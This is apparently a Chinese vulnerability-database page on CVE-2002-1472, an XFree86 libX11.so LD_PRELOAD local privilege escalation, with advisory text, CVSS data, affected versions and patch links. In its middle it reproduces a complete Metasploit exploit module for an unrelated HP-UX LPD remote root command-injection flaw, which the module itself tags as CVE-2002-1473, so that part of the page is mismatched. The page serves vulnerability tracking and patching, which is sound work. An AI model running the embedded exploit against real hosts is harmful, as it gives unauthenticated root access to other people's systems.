CVE-2002-1472
CVSS7.2
发布时间 :2003-03-03 00:00:00
修订时间 :2008-09-05 16:30:41
NMCOPS    

[原文]Untrusted search path vulnerability in libX11.so in xfree86, when used in setuid or setgid programs, allows local users to gain root privileges via a modified LD_PRELOAD environment variable that points to a malicious module.


[CNNVD]XFree86 libX11.so本地权限提升漏洞(CNNVD-200303-001)

        
        XFree86软件包包含多个程序和X SERVER运行所需的库,包括libX11.so库。
        XFree86软件包中的libX11.so库在装载其他库时路径处理不够正确,本地攻击者可以利用这个漏洞进行权限提升攻击。
        libX11.so库在动态装载其他库时其路径名环境变量可由执行用户控制,而且与libX11.so库连接的setuid程序在装载其他库的时候也执行相同的操作,这种行为可允许本地用户通过装载恶意库以不同的UID执行任意代码,造成权限提升。
        <*链接:http://www.suse.com/de/support/security/2002_032_xf86.html
        *>

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:xfree86_project:x11r6:4.2.0
cpe:/a:xfree86_project:x11r6:4.1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1472
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1472
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-001
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5735
(VENDOR_ADVISORY)  BID  5735
http://www.iss.net/security_center/static/10137.php
(VENDOR_ADVISORY)  XF  xfree86-x11-program-execution(10137)
http://archives.neohapsis.com/archives/linux/suse/2002-q3/1116.html
(VENDOR_ADVISORY)  SUSE  SuSE-SA:2002:032
http://www.redhat.com/support/errata/RHSA-2003-067.html
(UNKNOWN)  REDHAT  RHSA-2003:067
http://www.redhat.com/support/errata/RHSA-2003-066.html
(UNKNOWN)  REDHAT  RHSA-2003:066
http://www.osvdb.org/11922
(UNKNOWN)  OSVDB  11922
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000529
(UNKNOWN)  CONECTIVA  CLA-2002:529

- 漏洞信息

XFree86 libX11.so本地权限提升漏洞
高危 设计错误
2003-03-03 00:00:00 2006-11-06 00:00:00
本地  
        
        XFree86软件包包含多个程序和X SERVER运行所需的库,包括libX11.so库。
        XFree86软件包中的libX11.so库在装载其他库时路径处理不够正确,本地攻击者可以利用这个漏洞进行权限提升攻击。
        libX11.so库在动态装载其他库时其路径名环境变量可由执行用户控制,而且与libX11.so库连接的setuid程序在装载其他库的时候也执行相同的操作,这种行为可允许本地用户通过装载恶意库以不同的UID执行任意代码,造成权限提升。
        <*链接:http://www.suse.com/de/support/security/2002_032_xf86.html
        *>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用'ldd'工具来判断SETUID程序是否动态连接了libX11.so库,如果是,使用chmod u-s去掉相关的S位。
        厂商补丁:
        S.u.S.E.
        --------
        S.u.S.E.已经为此发布了一个安全公告(SuSE-SA:2002:032)以及相应补丁:
        SuSE-SA:2002:032:xf86
        链接:
        http://www.suse.com/de/support/security/2002_032_xf86.html

        补丁下载:
        i386 Intel Platform:
        SuSE-8.0
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/x1/xshared-4.2.0-174.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/x2/xdevel-4.2.0-174.i386.rpm
        source rpm:
        ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/xf86-4.2.0-174.src.rpm
        补丁安装方法:
        用"rpm -Fhv file.rpm"命令安装文件,完成后,如果rsync服务是用inetd启动的,向inetd进程发送信号重启之。如果rsync是用"rsync --daemon"命令启动的,则再用此命令重启rsync服务。

- 漏洞信息 (F82228)

HP-UX LPD Command Execution (PacketStormID:F82228)
2009-10-27 00:00:00
H D Moore  
exploit,overflow,arbitrary,root
hpux
CVE-2002-1472
[点击下载]

This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'HP-UX LPD Command Execution',
			'Description'    => %q{
				This exploit abuses an unpublished vulnerability in the
				HP-UX LPD service. This flaw allows an unauthenticated
				attacker to execute arbitrary commands with the privileges
				of the root user. The LPD service is only exploitable when
				the address of the attacking system can be resolved by the
				target. This vulnerability was silently patched with the
				buffer overflow flaws addressed in HP Security Bulletin
				HPSBUX0208-213.
					
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-1473'],
					[ 'OSVDB', '9638'],
					[ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],

				],
			'Platform'       => ['unix', 'hpux'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 200,
					'DisableNops' => true,
					'BadChars'    => "\x00\x09\x20\x2f",
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},			
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def exploit

		# The job ID is squashed down to three decimal digits
		jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# Connect to the LPD service
		connect
		
		print_status("Sending our job request with embedded command string...")
		# Send the job request with the encoded command
		sock.put(
			"\x02" + rand_text_alphanumeric(3) + jid +
			"`" + payload.encoded + "`\n"
		)
		
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our job request")
			return
		end

		print_status("Sending our fake control file...")		
		sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
		res = sock.get_once(1)
		if (res[0] != 0)
			print_status("The target did not accept our control file")
			return
		end
		
		print_status("Forcing an error and hijacking the cleanup routine...")
		
		begin
			sock.put(rand_text_alphanumeric(16384))
			disconnect
		rescue
		end
		
	end

end

    

- 漏洞信息

11922
XFree86 libX11.so LD_PRELOAD Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity

- 漏洞描述

A local overflow exists in XFree86. The libX11.so library fails to do a secure checking with the LD_PRELOAD environment variable while running a SUID executable. As a result an attacker can use his own library to poison a program using dynamically loadable libraries. By setting LD_PRELOAD, an attacker can execute arbitrary code and gain priviledges resulting in a loss of integrity.

- 时间线

2002-09-18 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

XFree86 libX11.so Local Privilege Escalation Vulnerability
Design Error 5735
No Yes
2002-09-18 12:00:00 2009-07-11 05:06:00
Advisory released by SuSE.

- 受影响的程序版本

XFree86 X11R6 4.2 .0
+ Conectiva Linux Enterprise Edition 1.0
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Workstation 8.0
XFree86 X11R6 4.1 .0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 7.0
S.u.S.E. Linux 8.0
RedHat XFree86-Xvfb-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-Xnest-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-xfs-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-xdm-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-xauth-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-twm-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-truetype-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-tools-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-Mesa-libGLU-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-Mesa-libGL-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-libs-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-9-75dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-9-100dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-2-75dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-2-100dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-15-75dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-ISO8859-15-100dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-font-utils-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-doc-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-devel-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-cyrillic-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-base-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-75dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
RedHat XFree86-100dpi-fonts-4.2.0-72.i386.rpm
+ RedHat Linux 8.0 i386
XFree86 X11R6 4.2.1
+ Immunix Immunix OS 7.3
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ RedHat Linux 7.3
+ Slackware Linux 8.1

- 不受影响的程序版本

XFree86 X11R6 4.2.1
+ Immunix Immunix OS 7.3
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ RedHat Linux 7.3
+ Slackware Linux 8.1

- 漏洞讨论

SuSE has reported a vulnerability in XFree86 that may affect other systems which include it. The xf86 package, which is included in the Suse Linux distribution, contains various programs and libraries that are necessary for X server to run. The package includes the libX11.so library.

When libX11.so is called it will dynamically load libraries via a path defined in a environment variable, controlled by the executing user. libX11.so fails to disable the variable when the process is setuid, allowing for malicious libraries to be loaded. Attackers may cause arbitrary code to be executed with escalated privileges

- 漏洞利用

No exploit is required.

- 解决方案

Red Hat has released an advisory (RHSA-2003:064-01) to address this issue. Details on obtaining and applying fixes are contained in the referenced advisory.

Red Hat has released an advisory (RHSA-2003:067-01) containing details that address this issue. Fixes are available below.

Upgrades available:


RedHat XFree86-ISO8859-9-75dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-xdm-4.2.0-72.i386.rpm

RedHat XFree86-xfs-4.2.0-72.i386.rpm

RedHat XFree86-base-fonts-4.2.0-72.i386.rpm

RedHat XFree86-Xnest-4.2.0-72.i386.rpm

RedHat XFree86-cyrillic-fonts-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-15-75dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-libs-4.2.0-72.i386.rpm

RedHat XFree86-tools-4.2.0-72.i386.rpm

RedHat XFree86-devel-4.2.0-72.i386.rpm

RedHat XFree86-Xvfb-4.2.0-72.i386.rpm

RedHat XFree86-truetype-fonts-4.2.0-72.i386.rpm

RedHat XFree86-75dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-9-100dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-Mesa-libGLU-4.2.0-72.i386.rpm

RedHat XFree86-100dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-xauth-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-2-100dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-twm-4.2.0-72.i386.rpm

RedHat XFree86-Mesa-libGL-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-15-100dpi-fonts-4.2.0-72.i386.rpm

RedHat XFree86-doc-4.2.0-72.i386.rpm

RedHat XFree86-font-utils-4.2.0-72.i386.rpm

RedHat XFree86-ISO8859-2-75dpi-fonts-4.2.0-72.i386.rpm

XFree86 X11R6 4.2 .0

S.u.S.E. Linux 8.0

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站